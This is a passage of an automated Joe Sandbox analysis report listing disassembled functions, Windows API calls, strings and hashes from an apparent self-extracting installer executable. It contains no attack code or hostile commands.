516->525 526 d8ac40-d8ac4f DeleteFileW 516->526 551 d8abd8-d8abe6 call d7b52e 517->551 552 d8abc7-d8abd6 call d920b3 517->552 525->503 540 d8ab72 525->540 526->525 533 d8ac51-d8ac54 526->533 528->529 529->493 538 d8ac58-d8ac84 call d73f5b GetFileAttributesW 533->538 534->489 549 d8ac56-d8ac57 538->549 550 d8ac86-d8ac9c MoveFileW 538->550 540->510 542->425 546 d8af92-d8afa4 SendMessageW 542->546 546->425 549->538 550->525 553 d8ac9e-d8aca8 MoveFileExW 550->553 551->503 558 d8abec-d8ac2b call d920b3 call d8dea0 551->558 552->551 552->558 553->525 558->516
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D8AA4A
                                                                                        • Part of subcall function 00D896EC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00D897B4
                                                                                      • SetFileAttributesW.KERNEL32(?,00000005,?,?,00000000,00000001,00D8A35D,?,00000000), ref: 00D8AB7F
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00D8AC39
                                                                                      • DeleteFileW.KERNEL32(?), ref: 00D8AC47
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00D8AD90
                                                                                      • _wcsrchr.LIBVCRUNTIME ref: 00D8AF1A
                                                                                      • GetDlgItem.USER32(?,00000066), ref: 00D8AF55
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00D8AF65
                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,00DB412A), ref: 00D8AF79
                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D8AFA2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                      • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                      • API String ID: 3676479488-312220925
                                                                                      • Opcode ID: f1a469ba20aeb97c24486aaea551e8d8e755959235e1e8177397cd48d8684c0b
                                                                                      • Instruction ID: 929c9967c25ceda8e9a7363696d5fd92021c83bf8b553adb8907c363139d6f53
                                                                                      • Opcode Fuzzy Hash: f1a469ba20aeb97c24486aaea551e8d8e755959235e1e8177397cd48d8684c0b
                                                                                      • Instruction Fuzzy Hash: BFE15C76900219AAEF21BBA4DD85EEE73BCEB05350F1440A7F949E7141EB709B84CB71
                                                                                      Function 00D7CED7 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 563 d7ced7-d7cf51 call d7c88e GetWindowRect GetClientRect 566 d7cf57-d7cf5f 563->566 567 d7cff2-d7cffa 563->567 568 d7d034-d7d04f GetSystemMetrics GetWindow 566->568 570 d7cf65-d7cfae 566->570 567->568 569 d7cffc-d7d02e GetWindowTextW call d7c91f SetWindowTextW 567->569 572 d7d12d-d7d12f 568->572 569->568 573 d7cfb2-d7cfb4 570->573 574 d7cfb0 570->574 575 d7d135-d7d13f 572->575 576 d7d054-d7d05a 572->576 578 d7cfb6 573->578 579 d7cfb8-d7cfee GetWindowLongW GetWindowRect 573->579 574->573 576->575 580 d7d060-d7d078 GetWindowTextW 576->580 578->579 579->567 582 d7d09f-d7d0a4 580->582 583 d7d07a-d7d099 call d7c91f SetWindowTextW 580->583 585 d7d0a6-d7d114 GetWindowRect 582->585 586 d7d11b-d7d12a GetWindow 582->586 583->582 585->586 586->575 587 d7d12c 586->587 587->572
                                                                                      APIs
                                                                                        • Part of subcall function 00D7C88E: _wcschr.LIBVCRUNTIME ref: 00D7C8BD
                                                                                      • GetWindowRect.USER32(?,?), ref: 00D7CF0E
                                                                                      • GetClientRect.USER32(?,?), ref: 00D7CF1A
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00D7CFBB
                                                                                      • GetWindowRect.USER32(?,?), ref: 00D7CFE8
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00D7D007
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00D7D02E
                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00D7D036
                                                                                      • GetWindow.USER32(?,00000005), ref: 00D7D041
                                                                                      • GetWindowTextW.USER32(00000000,?,00000400), ref: 00D7D06C
                                                                                      • SetWindowTextW.USER32(00000000,00000000), ref: 00D7D099
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00D7D0AC
                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00D7D11E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$RectText$ClientLongMetricsSystem_wcschr
                                                                                      • String ID: d
                                                                                      • API String ID: 4134264131-2564639436
                                                                                      • Opcode ID: a975c4ce43f36792b1069d2a49fc23430f94d9e9895c7c9cf5601dc5ef265e02
                                                                                      • Instruction ID: f04551ed18f49ee58fe1bd760655d0a86b8fcadccd50509c21dc02387fa42f99
                                                                                      • Opcode Fuzzy Hash: a975c4ce43f36792b1069d2a49fc23430f94d9e9895c7c9cf5601dc5ef265e02
                                                                                      • Instruction Fuzzy Hash: 58615A72208340AFD311DF68CD89A6BBBEAEF89714F44591DF684D2290D774E909CB72
                                                                                      Function 00D8B70E Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 96windowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(00000068,00DC8958), ref: 00D8B71D
                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00D89325), ref: 00D8B748
                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D8B757
                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,00DA02E4), ref: 00D8B761
                                                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D8B777
                                                                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D8B78D
                                                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D8B7CD
                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D8B7D7
                                                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D8B7E6
                                                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D8B809
                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,00DA1368), ref: 00D8B814
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$ItemShowWindow
                                                                                      • String ID: \
                                                                                      • API String ID: 1207805008-2967466578
                                                                                      • Opcode ID: d86b7a5c67280f7cd6b1c5f9ca53df04b27f3170b86308a635d71530be12ce82
                                                                                      • Instruction ID: a07936102181fb074ba06bd476198dc3665e33c9aa9ac8f55375b4feba3630c3
                                                                                      • Opcode Fuzzy Hash: d86b7a5c67280f7cd6b1c5f9ca53df04b27f3170b86308a635d71530be12ce82
                                                                                      • Instruction Fuzzy Hash: 8D210171285744BFE311BB249C41FAB7E9CEF82714F040619FA90E62D0D7A54A098BBB
                                                                                      Function 00D8B9AA Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 621 d8b9aa-d8b9c2 call d8cec0 624 d8b9c8-d8b9d4 call d920b3 621->624 625 d8bc0e-d8bc16 621->625 624->625 628 d8b9da-d8ba02 call d8dea0 624->628 631 d8ba0c-d8ba19 628->631 632 d8ba04 628->632 633 d8ba1b 631->633 634 d8ba1d-d8ba26 631->634 632->631 633->634 635 d8ba28-d8ba2a 634->635 636 d8ba5e 634->636 637 d8ba32-d8ba35 635->637 638 d8ba62-d8ba64 636->638 639 d8ba3b-d8ba43 637->639 640 d8bbc2-d8bbc7 637->640 641 d8ba6b-d8ba6d 638->641 642 d8ba66-d8ba69 638->642 643 d8ba49-d8ba4f 639->643 644 d8bbdb-d8bbe3 639->644 645 d8bbc9 640->645 646 d8bbbc-d8bbc0 640->646 647 d8ba80-d8ba92 call d7b09c 641->647 648 d8ba6f-d8ba76 641->648 642->641 642->647 643->644 649 d8ba55-d8ba5c 643->649 651 d8bbeb-d8bbf3 644->651 652 d8bbe5-d8bbe7 644->652 650 d8bbce-d8bbd2 645->650 646->640 646->650 656 d8baab-d8bab6 call d79dff 647->656 657 d8ba94-d8baa1 call d80b12 647->657 648->647 653 d8ba78 648->653 649->636 649->637 650->644 651->638 652->651 653->647 663 d8bab8-d8bacf call d7ae20 656->663 664 d8bad3-d8bae0 ShellExecuteExW 656->664 657->656 662 d8baa3 657->662 662->656 663->664 666 d8bc0c-d8bc0d 664->666 667 d8bae6-d8baf9 664->667 666->625 669 d8bafb-d8bb02 667->669 670 d8bb0c-d8bb0e 667->670 669->670 671 d8bb04-d8bb0a 669->671 672 d8bb10-d8bb19 670->672 673 d8bb21-d8bb40 call d8be69 670->673 671->670 674 d8bb77-d8bb83 CloseHandle 671->674 672->673 679 d8bb1b-d8bb1f ShowWindow 672->679 673->674 691 d8bb42-d8bb4a 673->691 677 d8bb94-d8bba2 674->677 678 d8bb85-d8bb92 call d80b12 674->678 680 d8bbff-d8bc01 677->680 681 d8bba4-d8bba6 677->681 678->677 689 d8bbf8 678->689 679->673 680->666 684 d8bc03-d8bc05 680->684 681->680 686 d8bba8-d8bbae 681->686 684->666 688 d8bc07-d8bc0a ShowWindow 684->688 686->680 690 d8bbb0-d8bbba 686->690 688->666 689->680 690->680 691->674 692 d8bb4c-d8bb5d GetExitCodeProcess 691->692 692->674 693 d8bb5f-d8bb69 692->693 694 d8bb6b 693->694 695 d8bb70 693->695 694->695 695->674
                                                                                      APIs
                                                                                      • ShellExecuteExW.SHELL32(000001C0), ref: 00D8BAD8
                                                                                      • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 00D8BB1D
                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00D8BB55
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D8BB7B
                                                                                      • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 00D8BC0A
                                                                                        • Part of subcall function 00D80B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00D7AC49,?,?,?,00D7ABF8,?,-00000002,?,00000000,?), ref: 00D80B28
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                                                      • String ID: $.exe$.inf
                                                                                      • API String ID: 3686203788-2452507128
                                                                                      • Opcode ID: 489f70c44a011494fbe1a0ea8780603b780df84d3e5e5ff324126f060405e45c
                                                                                      • Instruction ID: 7e5096b504fae094d586ce0ccb057967f26e546b14660102bf078c142d5ccb07
                                                                                      • Opcode Fuzzy Hash: 489f70c44a011494fbe1a0ea8780603b780df84d3e5e5ff324126f060405e45c
                                                                                      • Instruction Fuzzy Hash: 2C51E5705057819AD731BF24C940ABBBBF9EF85724F08081EE4C593295EBB1A948DB72
                                                                                      Function 00D7CACC Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 258COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 696 d7cacc-d7cb00 call d8cdf0 call d8cec0 call d90138 703 d7cb33-d7cb3c call d7f10e 696->703 704 d7cb02-d7cb31 GetModuleFileNameW call d7b88c call d7f0e6 696->704 707 d7cb41-d7cb65 call d79401 call d7973d 703->707 704->707 715 d7cb6b-d7cb74 707->715 716 d7cdb8-d7cdd3 call d79437 707->716 718 d7cb77-d7cb7a 715->718 720 d7cb80-d7cb86 call d79aeb 718->720 721 d7cca8-d7ccc8 call d799e0 call d920d3 718->721 725 d7cb8b-d7cbb2 call d7990d 720->725 721->716 732 d7ccce-d7cce7 call d7990d 721->732 730 d7cc71-d7cc74 725->730 731 d7cbb8-d7cbc0 725->731 736 d7cc77-d7cc99 call d799e0 730->736 734 d7cbc2-d7cbca 731->734 735 d7cbeb-d7cbf6 731->735 742 d7ccf0-d7cd02 call d920d3 732->742 743 d7cce9-d7ccee 732->743 734->735 738 d7cbcc-d7cbe6 call d93660 734->738 739 d7cc21-d7cc29 735->739 740 d7cbf8-d7cc04 735->740 736->718 754 d7cc9f-d7cca2 736->754 757 d7cc67-d7cc6f 738->757 758 d7cbe8 738->758 747 d7cc55-d7cc59 739->747 748 d7cc2b-d7cc33 739->748 740->739 745 d7cc06-d7cc0b 740->745 742->716 764 d7cd08-d7cd25 call d806e9 call d920ce 742->764 750 d7cd27-d7cd2f 743->750 745->739 753 d7cc0d-d7cc1f call d93589 745->753 747->730 749 d7cc5b-d7cc5e 747->749 748->747 755 d7cc35-d7cc4f call d93660 748->755 749->731 760 d7cd34-d7cd41 750->760 761 d7cd31 750->761 753->739 769 d7cc63 753->769 754->716 754->721 755->716 755->747 757->736 758->735 766 d7cd43-d7cd45 760->766 767 d7cdad-d7cdb5 760->767 761->760 764->750 770 d7cd46-d7cd50 766->770 767->716 769->757 770->767 771 d7cd52-d7cd56 770->771 773 d7cd90-d7cd93 771->773 774 d7cd58-d7cd5f 771->774 779 d7cd95-d7cd9b 773->779 780 d7cd9d-d7cd9f 773->780 776 d7cd86 774->776 777 d7cd61-d7cd64 774->777 783 d7cd88-d7cd8e 776->783 781 d7cd66-d7cd69 777->781 782 d7cd82-d7cd84 777->782 779->780 784 d7cda0 779->784 780->784 786 d7cd7e-d7cd80 781->786 787 d7cd6b-d7cd6e 781->787 782->783 785 d7cda4-d7cdab 783->785 784->785 785->767 785->770 786->783 788 d7cd70-d7cd74 787->788 789 d7cd7a-d7cd7c 787->789 788->784 790 d7cd76-d7cd78 788->790 789->783 790->783
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D7CAD1
                                                                                      • _wcschr.LIBVCRUNTIME ref: 00D7CAEF
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00D7CAB3,?), ref: 00D7CB0A
                                                                                        • Part of subcall function 00D806E9: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D7B25B,00000000,?,?), ref: 00D80705
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharFileH_prologModuleMultiNameWide_wcschr
                                                                                      • String ID: *messages***$*messages***$R$a
                                                                                      • API String ID: 803915177-2900423073
                                                                                      • Opcode ID: 6c98c01bb61cdd0dbf27c766987efe3a1c783c6049a25ec8726a35788bfde9ef
                                                                                      • Instruction ID: 1ce4b8a879bdc91076f9f2bfa1f65aa7cde88506c894ac466994e07ae6f27443
                                                                                      • Opcode Fuzzy Hash: 6c98c01bb61cdd0dbf27c766987efe3a1c783c6049a25ec8726a35788bfde9ef
                                                                                      • Instruction Fuzzy Hash: C29105B2A102049EDB30DF68CC45BAEBBA4EF54310F18D56EE64DA7291F7709984CB70
                                                                                      Function 00D973AE Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 216COMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 791 d973ae-d973c7 792 d973c9-d973d9 call d9b9bc 791->792 793 d973dd-d973e2 791->793 792->793 803 d973db 792->803 795 d973ef-d97413 MultiByteToWideChar 793->795 796 d973e4-d973ec 793->796 797 d97419-d97425 795->797 798 d975a6-d975b9 call d8d783 795->798 796->795 800 d97479 797->800 801 d97427-d97438 797->801 807 d9747b-d9747d 800->807 804 d9743a-d97449 call d9f160 801->804 805 d97457-d97468 call d959fc 801->805 803->793 810 d9759b 804->810 818 d9744f-d97455 804->818 805->810 819 d9746e 805->819 807->810 811 d97483-d97496 MultiByteToWideChar 807->811 812 d9759d-d975a4 call d97616 810->812 811->810 815 d9749c-d974ae call d97a09 811->815 812->798 820 d974b3-d974b7 815->820 822 d97474-d97477 818->822 819->822 820->810 823 d974bd-d974c4 820->823 822->807 824 d974fe-d9750a 823->824 825 d974c6-d974cb 823->825 827 d9750c-d9751d 824->827 828 d97556 824->828 825->812 826 d974d1-d974d3 825->826 826->810 829 d974d9-d974f3 call d97a09 826->829 831 d97538-d97549 call d959fc 827->831 832 d9751f-d9752e call d9f160 827->832 830 d97558-d9755a 828->830 829->812 844 d974f9 829->844 835 d9755c-d97575 call d97a09 830->835 836 d97594-d9759a call d97616 830->836 831->836 843 d9754b 831->843 832->836 847 d97530-d97536 832->847 835->836 849 d97577-d9757e 835->849 836->810 848 d97551-d97554 843->848 844->810 847->848 848->830 850 d975ba-d975c0 849->850 851 d97580-d97581 849->851 852 d97582-d97592 WideCharToMultiByte 850->852 851->852 852->836 853 d975c2-d975c9 call d97616 852->853 853->812
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D92FC2,00D92FC2,?,?,?,00D975FF,00000001,00000001,F5E85006), ref: 00D97408
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D975FF,00000001,00000001,F5E85006,?,?,?), ref: 00D9748E
                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D97588
                                                                                      • __freea.LIBCMT ref: 00D97595
                                                                                        • Part of subcall function 00D959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D923AA,?,0000015D,?,?,?,?,00D92F29,000000FF,00000000,?,?), ref: 00D95A2E
                                                                                      • __freea.LIBCMT ref: 00D9759E
                                                                                      • __freea.LIBCMT ref: 00D975C3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                      • String ID: d0F
                                                                                      • API String ID: 1414292761-1238022483
                                                                                      • Opcode ID: cb53e77fc731a48cc29506ed7891295a4df99ead5ce50839539afadad2287fa1
                                                                                      • Instruction ID: 56f1f3e5aab6f8b11599b50885700bb1c1e24207f5ef515bfae2366a3e1e4ef6
                                                                                      • Opcode Fuzzy Hash: cb53e77fc731a48cc29506ed7891295a4df99ead5ce50839539afadad2287fa1
                                                                                      • Instruction Fuzzy Hash: F051E272624216ABEF658F64CC81EBF7BA9EB44750F5A4629FC04D7190EB34DC40C6B0
                                                                                      Function 00D89036 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35comCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00D7F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D7F324
                                                                                        • Part of subcall function 00D7F309: LoadLibraryW.KERNELBASE(?,?,00D7DEC8,Crypt32.dll,?,00D7DF4A,?,00D7DF2E,?,?,?,?), ref: 00D7F346
                                                                                      • OleInitialize.OLE32(00000000), ref: 00D8904F
                                                                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D89086
                                                                                      • SHGetMalloc.SHELL32(00DB20E8), ref: 00D89090
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                      • String ID: riched20.dll$3Ro
                                                                                      • API String ID: 3498096277-3613677438
                                                                                      • Opcode ID: a1f958cccfb55ace794bf7b8613323329e00d394014293b772425c9691f3bb3f
                                                                                      • Instruction ID: bc04940ed51e7bba9e1eaee19e909ca7a2684c64669144a5bc9b7f68b4369c4c
                                                                                      • Opcode Fuzzy Hash: a1f958cccfb55ace794bf7b8613323329e00d394014293b772425c9691f3bb3f
                                                                                      • Instruction Fuzzy Hash: 2FF0FFB5D00209ABCB50AF9AD8499EEFFFCEF95711F00415AE814E2250D7B45645CBB2
                                                                                      Function 00D7F9D1 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00D7FDC9: ResetEvent.KERNEL32(?,?,00D7F9F3,01021ED8,?,00DB1E74,00000000,00D9F79B,000000FF,000001B8,00D7FC8F,?,?,?,?,00D7A5A0), ref: 00D7FDE9
                                                                                        • Part of subcall function 00D7FDC9: ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,?,?,00D7A5A0,?,?,?,?,00D9F79B,000000FF), ref: 00D7FDFD
                                                                                      • ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 00D7FA05
                                                                                      • CloseHandle.KERNEL32(?,?), ref: 00D7FA1F
                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 00D7FA38
                                                                                      • CloseHandle.KERNELBASE(?), ref: 00D7FA44
                                                                                      • CloseHandle.KERNEL32(?), ref: 00D7FA50
                                                                                        • Part of subcall function 00D7FAC7: WaitForSingleObject.KERNEL32(?,000000FF,00D7FD0B,?,?,00D7FD80,?,?,?,?,?,00D7FD6A), ref: 00D7FACD
                                                                                        • Part of subcall function 00D7FAC7: GetLastError.KERNEL32(?,?,00D7FD80,?,?,?,?,?,00D7FD6A), ref: 00D7FAD9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
